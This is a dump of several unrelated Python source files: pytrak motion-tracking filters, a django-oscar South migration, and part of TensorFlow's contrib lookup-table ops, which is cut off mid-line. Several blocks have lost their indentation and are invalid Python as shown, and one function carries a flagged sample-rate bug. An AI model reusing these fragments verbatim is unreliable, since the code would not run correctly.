        assert_(sibc.to_numpy_code(code) == '>')
    # Unknown spellings must raise.
    assert_raises(ValueError, sibc.to_numpy_code, 'silly string')
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause |
lindemann09/pytrak | pytrak/analysis/movement_analysis.py | 1 | 2267 | """helpful functions to analyses pytrak data"""
__author__ = "Oliver Lindemann"
from scipy import signal
import numpy as np
def inch2cm(data):
    """Converts numpy data in inch to cm."""
    cm_per_inch = 2.54
    return data * cm_per_inch
def velocity(data, timestamps):
    """Calculates velocity of data for all sensors.

    data: array of shape (n_sensors, n_samples, 3), positions in cm
    timestamps: array of length n_samples, in ms
    returns: array of shape (n_samples, n_sensors), velocity in m/sec
    (the first sample of each sensor is 0, since no predecessor exists)
    """
    # Position deltas between consecutive samples, converted cm -> m.
    diff_meter = (data[:, 0:-1, :] - data[:, 1:, :]) / 100.0
    # Euclidean distance per step, per sensor: shape (n_sensors, n_samples-1).
    dist = np.sqrt(np.sum(diff_meter ** 2, axis=2))
    # Time deltas converted ms -> s.
    tdiff = np.diff(timestamps) / 1000.0
    # List comprehension instead of Python-2 map(): map() returns a lazy
    # iterator under Python 3, which np.array() cannot turn into a 2-D array.
    per_sensor = [np.concatenate(([0], sensor_dist / tdiff))
                  for sensor_dist in dist]
    return np.transpose(np.array(per_sensor))
def estimate_sample_rate(timestamps):
    """Estimates the sampling rate in Hz from an array of timestamps (ms)."""
    mean_interval_ms = np.mean(np.diff(timestamps))
    return 1000.0 / mean_interval_ms
## data filtering
def butter_lowpass(lowcut, sample_rate, order=3):
    """Design a Butterworth lowpass filter.

    Sample rate and desired cutoff frequency (lowcut) are in Hz.
    Returns the (b, a) filter coefficients.
    """
    nyquist = 0.5 * sample_rate
    normalized_cutoff = lowcut / nyquist
    return signal.butter(N=order, Wn=normalized_cutoff, btype='lowpass')
def butter_lowpass_filter(data, lowcut=10, order=3,
                          sample_rate=None):
    """Lowpass-filter the data of all sensors.

    data: iterable of per-sensor sample arrays
    lowcut: cutoff frequency in Hz
    Returns the filtered data as a numpy array of the same shape.
    """
    # print() call instead of Python-2 print statement (syntax error in Py3).
    print("filtering data")
    if sample_rate is None:
        # NOTE(review): estimate_sample_rate expects *timestamps* (ms), but
        # here it receives the data itself -- the estimate is almost certainly
        # wrong. Preserved for backward compatibility; callers should pass
        # sample_rate explicitly.
        sample_rate = estimate_sample_rate(data)
    b, a = butter_lowpass(lowcut, sample_rate, order=order)
    # List comprehension instead of Python-2 map(), whose lazy iterator
    # np.array() cannot convert into a proper 2-D array under Python 3.
    filtered = [signal.lfilter(b, a, sensor) for sensor in data]
    return np.array(filtered)
def moving_average_filter(data, window_size=5):
    """Moving average filter / running mean, applied in place per sensor axis.

    The first and last `window_size` samples are restored to their original
    values afterwards, so only the interior is smoothed.

    Note
    -----
    see http://stackoverflow.com/questions/13728392/moving-average-or-running-mean
    or http://stackoverflow.com/questions/11352047/finding-moving-average-from-data-points-in-python
    """
    kernel = np.ones(int(window_size)) / float(window_size)
    n_sensors, _, n_dims = np.shape(data)
    for sensor in range(n_sensors):
        for dim in range(n_dims):
            # Keep copies of the edges, which 'same'-mode convolution distorts.
            head = np.copy(data[sensor, :window_size:, dim])
            tail = np.copy(data[sensor, -window_size:, dim])
            data[sensor, :, dim] = np.convolve(data[sensor, :, dim], kernel, 'same')
            data[sensor, :window_size:, dim] = head
            data[sensor, -window_size:, dim] = tail
    return np.array(data)
Idematica/django-oscar | oscar/apps/offer/migrations/0021_auto__chg_field_benefit_type__chg_field_conditionaloffer_description.py | 17 | 16561 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply: make Benefit.type and ConditionalOffer.description non-nullable."""

        # Changing field 'Benefit.type'
        # '' is used as the backfill default for existing NULL rows.
        db.alter_column('offer_benefit', 'type', self.gf('django.db.models.fields.CharField')(default='', max_length=128))

        # Changing field 'ConditionalOffer.description'
        db.alter_column('offer_conditionaloffer', 'description', self.gf('django.db.models.fields.TextField')(default=''))
def backwards(self, orm):
# Changing field 'Benefit.type'
db.alter_column('offer_benefit', 'type', self.gf('django.db.models.fields.CharField')(max_length=128, null=True))
# Changing field 'ConditionalOffer.description'
db.alter_column('offer_conditionaloffer', 'description', self.gf('django.db.models.fields.TextField')(null=True))
models = {
'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': "orm['catalogue.AttributeEntityType']"})
},
'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'})
},
'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': "orm['catalogue.AttributeOptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
},
'catalogue.option': {
'Meta': {'object_name': 'Option'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'})
},
'catalogue.product': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'},
'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.ProductAttribute']", 'through': "orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Category']", 'through': "orm['catalogue.ProductCategory']", 'symmetrical': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': "orm['catalogue.Product']"}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductClass']", 'null': 'True'}),
'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'rating': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Product']", 'symmetrical': 'False', 'through': "orm['catalogue.ProductRecommendation']", 'blank': 'True'}),
'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '128', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'catalogue.productattribute': {
'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'},
'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}),
'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 'True', 'to': "orm['catalogue.ProductClass']"}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'})
},
'catalogue.productattributevalue': {
'Meta': {'object_name': 'ProductAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.ProductAttribute']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': "orm['catalogue.Product']"}),
'value_boolean': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}),
'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'catalogue.productcategory': {
'Meta': {'ordering': "['-is_canonical']", 'object_name': 'ProductCategory'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Category']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_canonical': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'catalogue.productclass': {
'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}),
'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalogue.productrecommendation': {
'Meta': {'object_name': 'ProductRecommendation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': "orm['catalogue.Product']"}),
'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'offer.benefit': {
'Meta': {'object_name': 'Benefit'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_affected_items': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.condition': {
'Meta': {'object_name': 'Condition'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.conditionaloffer': {
'Meta': {'ordering': "['-priority']", 'object_name': 'ConditionalOffer'},
'benefit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Benefit']"}),
'condition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Condition']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_basket_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_discount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'max_global_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_user_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'num_applications': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offer_type': ('django.db.models.fields.CharField', [], {'default': "'Site'", 'max_length': '128'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'redirect_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '64'}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'offer.range': {
'Meta': {'object_name': 'Range'},
'classes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'classes'", 'blank': 'True', 'to': "orm['catalogue.ProductClass']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'excluded_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'excludes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'included_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Category']"}),
'included_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'includes_all_products': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['offer'] | bsd-3-clause |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Lookup table operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import gen_lookup_ops
from tensorflow.python.ops import lookup_ops
# pylint: disable=unused-import
from tensorflow.python.ops.lookup_ops import FastHashSpec
from tensorflow.python.ops.lookup_ops import HasherSpec
from tensorflow.python.ops.lookup_ops import HashTable
from tensorflow.python.ops.lookup_ops import IdTableWithHashBuckets
from tensorflow.python.ops.lookup_ops import index_table_from_file
from tensorflow.python.ops.lookup_ops import index_to_string_table_from_file
from tensorflow.python.ops.lookup_ops import InitializableLookupTableBase
from tensorflow.python.ops.lookup_ops import KeyValueTensorInitializer
from tensorflow.python.ops.lookup_ops import LookupInterface
from tensorflow.python.ops.lookup_ops import StrongHashSpec
from tensorflow.python.ops.lookup_ops import TableInitializerBase
from tensorflow.python.ops.lookup_ops import TextFileIdTableInitializer
from tensorflow.python.ops.lookup_ops import TextFileIndex
from tensorflow.python.ops.lookup_ops import TextFileInitializer
from tensorflow.python.ops.lookup_ops import TextFileStringTableInitializer
# pylint: enable=unused-import
from tensorflow.python.training.saver import BaseSaverBuilder
from tensorflow.python.util.deprecation import deprecated
@deprecated("2017-04-10", "Use `index_table_from_file`.")
def string_to_index_table_from_file(vocabulary_file=None,
num_oov_buckets=0,
vocab_size=None,
default_value=-1,
hasher_spec=FastHashSpec,
name=None):
return index_table_from_file(
vocabulary_file, num_oov_buckets, vocab_size, default_value, hasher_spec,
key_dtype=dtypes.string, name=name)
@deprecated("2017-04-10", "Use `index_table_from_tensor`.")
def string_to_index_table_from_tensor(mapping,
num_oov_buckets=0,
default_value=-1,
hasher_spec=FastHashSpec,
name=None):
with ops.name_scope(name, "string_to_index") as scope:
mapping = ops.convert_to_tensor(mapping)
if dtypes.string != mapping.dtype.base_dtype:
raise ValueError("string_to_index_table_from_tensor requires string.")
return index_table_from_tensor(
mapping, num_oov_buckets, default_value, hasher_spec, name=scope)
def index_table_from_tensor(mapping,
                            num_oov_buckets=0,
                            default_value=-1,
                            hasher_spec=FastHashSpec,
                            dtype=dtypes.string,
                            name=None):
  """Returns a lookup table that converts a string tensor into int64 IDs.

  Builds a table whose keys are the elements of the 1-D `mapping` tensor and
  whose values are the corresponding positions within that tensor.  A lookup
  of an out-of-vocabulary key falls into one of `num_oov_buckets` hash
  buckets in the range
  `[mapping size, mapping size + num_oov_buckets - 1]`, selected by
  `hasher_spec`; with zero buckets it yields `default_value` instead.

  The underlying table must be initialized once, via
  `tf.tables_initializer.run()` or `table.init.run()`.  Duplicate elements
  in `mapping` make the initializer op raise a `FailedPreconditionError`.

  Sample Usages:

  ```python
  mapping_strings = tf.constant(["emerson", "lake", "palmer"])
  table = tf.contrib.lookup.index_table_from_tensor(
      mapping=mapping_strings, num_oov_buckets=1, default_value=-1)
  features = tf.constant(["emerson", "lake", "and", "palmer"])
  ids = table.lookup(features)
  ...
  tf.tables_initializer().run()
  ids.eval()  ==> [0, 1, 4, 2]
  ```

  Args:
    mapping: A 1-D `Tensor` mapping keys to indices; its type must be
      castable to `dtype`.
    num_oov_buckets: The number of out-of-vocabulary buckets.
    default_value: The value used for out-of-vocabulary feature values.
      Defaults to -1.
    hasher_spec: A `HasherSpec` choosing the hash function that assigns
      out-of-vocabulary buckets.
    dtype: The type of values passed to `lookup`; only strings and integers
      are supported.
    name: A name for this op (optional).

  Returns:
    The lookup table mapping an input `Tensor` to an index `int64` `Tensor`.

  Raises:
    ValueError: If `mapping` is invalid.
    ValueError: If `num_oov_buckets` is negative.
  """
  # Guard clause: a missing mapping cannot build a table.
  if mapping is None:
    raise ValueError("mapping must be specified.")
  return lookup_ops.index_table_from_tensor(
      vocabulary_list=mapping,
      num_oov_buckets=num_oov_buckets,
      default_value=default_value,
      hasher_spec=hasher_spec,
      dtype=dtype,
      name=name)
@deprecated(
    "2017-01-07", "This op will be removed after the deprecation date. "
    "Please switch to index_table_from_tensor and call the lookup "
    "method of the returned table.")
def string_to_index(tensor, mapping, default_value=-1, name=None):
  """Maps `tensor` of strings into `int64` indices based on `mapping`.

  Builds an initializable table from the 1-D string `mapping` tensor
  (element -> position) and immediately looks `tensor` up in it.  Strings
  absent from `mapping` map to `default_value`.  Duplicates in `mapping`
  make the initialization raise a `FailedPreconditionError`, and the
  underlying table must be initialized with `tf.tables_initializer.run()`
  before use.

  For example:

  ```python
  mapping_strings = tf.constant(["emerson", "lake", "palmer"])
  feats = tf.constant(["emerson", "lake", "and", "palmer"])
  ids = tf.contrib.lookup.string_to_index(
      feats, mapping=mapping_strings, default_value=-1)
  ...
  tf.tables_initializer().run()
  ids.eval()  ==> [0, 1, -1, 2]
  ```

  Args:
    tensor: A 1-D input `Tensor` with the strings to map to indices.
    mapping: A 1-D string `Tensor` mapping strings to indices.
    default_value: The `int64` value used for out-of-vocabulary strings.
      Defaults to -1.
    name: A name for this op (optional).

  Returns:
    The mapped indices, with the same shape and tensor type (dense or
    sparse) as `tensor`.
  """
  lookup_table = index_table_from_tensor(
      mapping=mapping, default_value=default_value, name=name)
  return lookup_table.lookup(tensor)
def index_to_string_table_from_tensor(mapping, default_value="UNK", name=None):
"""Returns a lookup table that maps a `Tensor` of indices into strings.
This operation constructs a lookup table to map int64 indices into string
values. The mapping is initialized from a string `mapping` 1-D `Tensor` where
each element is a value and the corresponding index within the tensor is the
key.
Any input which does not have a corresponding index in 'mapping'
(an out-of-vocabulary entry) is assigned the `default_value`
The underlying table must be initialized by calling
`tf.tables_initializer.run()` or `table.init.run()` once.
Elements in `mapping` cannot have duplicates, otherwise when executing the
table initializer op, it will throw a `FailedPreconditionError`.
Sample Usages:
```python
mapping_string = tf.constant(["emerson", "lake", "palmer"])
indices = tf.constant([1, 5], tf.int64)
table = tf.contrib.lookup.index_to_string_table_from_tensor(
mapping_string, default_value="UNKNOWN")
values = table.lookup(indices)
...
tf.tables_initializer().run()
values.eval() ==> ["lake", "UNKNOWN"]
```
Args:
mapping: A 1-D string `Tensor` that specifies the strings to map from
indices.
default_value: The value to use for out-of-vocabulary indices.
name: A name for this op (optional).
Returns:
The lookup table to map a string values associated to a given index `int64`
`Tensors`.
Raises:
ValueError: when `mapping` is not set.
"""
if mapping is None:
raise ValueError("mapping must be specified.")
return lookup_ops.index_to_string_table_from_tensor(
vocabulary_list=mapping, default_value=default_value, name=name)
@deprecated(
    "2017-01-07", "This op will be removed after the deprecation date. "
    "Please switch to index_to_string_table_from_tensor and call the lookup "
    "method of the returned table.")
def index_to_string(tensor, mapping, default_value="UNK", name=None):
  """Maps `tensor` of indices into string values based on `mapping`.

  Builds an initializable table from the 1-D string `mapping` tensor
  (position -> element) and immediately looks the `int64` `tensor` up in
  it.  Indices without a corresponding entry in `mapping` yield
  `default_value`.  The underlying table must be initialized with
  `tf.tables_initializer.run()` before use.

  For example:

  ```python
  mapping_string = tf.constant(["emerson", "lake", "palmer"])
  indices = tf.constant([1, 5], tf.int64)
  values = tf.contrib.lookup.index_to_string(
      indices, mapping=mapping_string, default_value="UNKNOWN")
  ...
  tf.tables_initializer().run()
  values.eval() ==> ["lake", "UNKNOWN"]
  ```

  Args:
    tensor: A `int64` `Tensor` with the indices to map to strings.
    mapping: A 1-D string `Tensor` giving the string for each index.
    default_value: The string value used for out-of-vocabulary indices.
    name: A name for this op (optional).

  Returns:
    The string values associated to the indices; the resultant dense
    feature value tensor has the same shape as the corresponding `indices`.
  """
  lookup_table = index_to_string_table_from_tensor(
      mapping=mapping, default_value=default_value, name=name)
  return lookup_table.lookup(tensor)
class MutableHashTable(LookupInterface):
  """A generic mutable hash table implementation.

  Data can be inserted by calling the insert method. It does not support
  initialization via the init method.

  Example usage:

  ```python
  table = tf.contrib.lookup.MutableHashTable(key_dtype=tf.string,
                                             value_dtype=tf.int64,
                                             default_value=-1)
  table.insert(keys, values)
  out = table.lookup(query_keys)
  print(out.eval())
  ```
  """

  def __init__(self,
               key_dtype,
               value_dtype,
               default_value,
               shared_name=None,
               name="MutableHashTable",
               checkpoint=True):
    """Creates an empty `MutableHashTable` object.

    Creates a table, the type of its keys and values are specified by key_dtype
    and value_dtype, respectively.

    Args:
      key_dtype: the type of the key tensors.
      value_dtype: the type of the value tensors.
      default_value: The value to use if a key is missing in the table.
      shared_name: If non-empty, this table will be shared under
        the given name across multiple sessions.
      name: A name for the operation (optional).
      checkpoint: if True, the contents of the table are saved to and restored
        from checkpoints. If `shared_name` is empty for a checkpointed table, it
        is shared using the table node name.

    Returns:
      A `MutableHashTable` object.

    Raises:
      ValueError: If checkpoint is True and no name was specified.
    """
    self._default_value = ops.convert_to_tensor(default_value,
                                                dtype=value_dtype)
    self._value_shape = self._default_value.get_shape()

    # The table must be shared if checkpointing is requested for multi-worker
    # training to work correctly. Use the node name if no shared_name has been
    # explicitly specified.
    use_node_name_sharing = checkpoint and shared_name is None
    # A scalar default value selects the plain hash-table kernel; a
    # non-scalar default requires the tensor-valued variant, which also
    # needs the value shape.
    # pylint: disable=protected-access
    if self._default_value.get_shape().ndims == 0:
      self._table_ref = gen_lookup_ops._mutable_hash_table_v2(
          shared_name=shared_name,
          use_node_name_sharing=use_node_name_sharing,
          key_dtype=key_dtype,
          value_dtype=value_dtype,
          name=name)
    else:
      self._table_ref = gen_lookup_ops._mutable_hash_table_of_tensors_v2(
          shared_name=shared_name,
          use_node_name_sharing=use_node_name_sharing,
          key_dtype=key_dtype,
          value_dtype=value_dtype,
          value_shape=self._default_value.get_shape(),
          name=name)
    # pylint: enable=protected-access

    # The base class stores the final component of the op name as the
    # table's display name.
    super(MutableHashTable, self).__init__(key_dtype, value_dtype,
                                           self._table_ref.op.name.split(
                                               "/")[-1])

    if checkpoint:
      # Register a saveable so the table contents participate in
      # checkpoint save/restore.
      saveable = MutableHashTable._Saveable(self, name)
      ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, saveable)

  def size(self, name=None):
    """Compute the number of elements in this table.

    Args:
      name: A name for the operation (optional).

    Returns:
      A scalar tensor containing the number of elements in this table.
    """
    with ops.name_scope(name, "%s_Size" % self._name,
                        [self._table_ref]) as name:
      with ops.colocate_with(self._table_ref):
        # pylint: disable=protected-access
        return gen_lookup_ops._lookup_table_size_v2(self._table_ref, name=name)

  def lookup(self, keys, name=None):
    """Looks up `keys` in a table, outputs the corresponding values.

    The `default_value` is used for keys not present in the table.

    Args:
      keys: Keys to look up. Can be a tensor of any shape. Must match the
        table's key_dtype.
      name: A name for the operation (optional).

    Returns:
      A tensor containing the values in the same shape as `keys` using the
        table's value type.

    Raises:
      TypeError: when `keys` do not match the table data types.
    """
    if keys.dtype != self._key_dtype:
      raise TypeError("Signature mismatch. Keys must be dtype %s, got %s." %
                      (self._key_dtype, keys.dtype))

    with ops.name_scope(name, "%s_lookup_table_find" % self._name,
                        (self._table_ref, keys, self._default_value)) as name:
      with ops.colocate_with(self._table_ref):
        # pylint: disable=protected-access
        values = gen_lookup_ops._lookup_table_find_v2(
            self._table_ref, keys, self._default_value, name=name)
        # Static output shape is the key shape extended by the value shape.
        values.set_shape(keys.get_shape().concatenate(self._value_shape))
    return values

  def insert(self, keys, values, name=None):
    """Associates `keys` with `values`.

    Args:
      keys: Keys to insert. Can be a tensor of any shape. Must match the
        table's key type.
      values: Values to be associated with keys. Must be a tensor of the same
        shape as `keys` and match the table's value type.
      name: A name for the operation (optional).

    Returns:
      The created Operation.

    Raises:
      TypeError: when `keys` or `values` doesn't match the table data
        types.
    """
    # pylint: disable=protected-access
    lookup_ops._check_table_dtypes(self, keys.dtype, values.dtype)
    # pylint: enable=protected-access
    with ops.name_scope(name, "%s_lookup_table_insert" % self._name,
                        [self._table_ref, keys, values]) as name:
      with ops.colocate_with(self._table_ref):
        # pylint: disable=protected-access
        op = gen_lookup_ops._lookup_table_insert_v2(
            self._table_ref, keys, values, name=name)
    return op

  def export(self, name=None):
    """Returns tensors of all keys and values in the table.

    Args:
      name: A name for the operation (optional).

    Returns:
      A pair of tensors with the first tensor containing all keys and the
        second tensors containing all values in the table.
    """
    with ops.name_scope(name, "%s_lookup_table_export_values" % self._name,
                        [self._table_ref]) as name:
      with ops.colocate_with(self._table_ref):
        # pylint: disable=protected-access
        exported_keys, exported_values = gen_lookup_ops._lookup_table_export_v2(
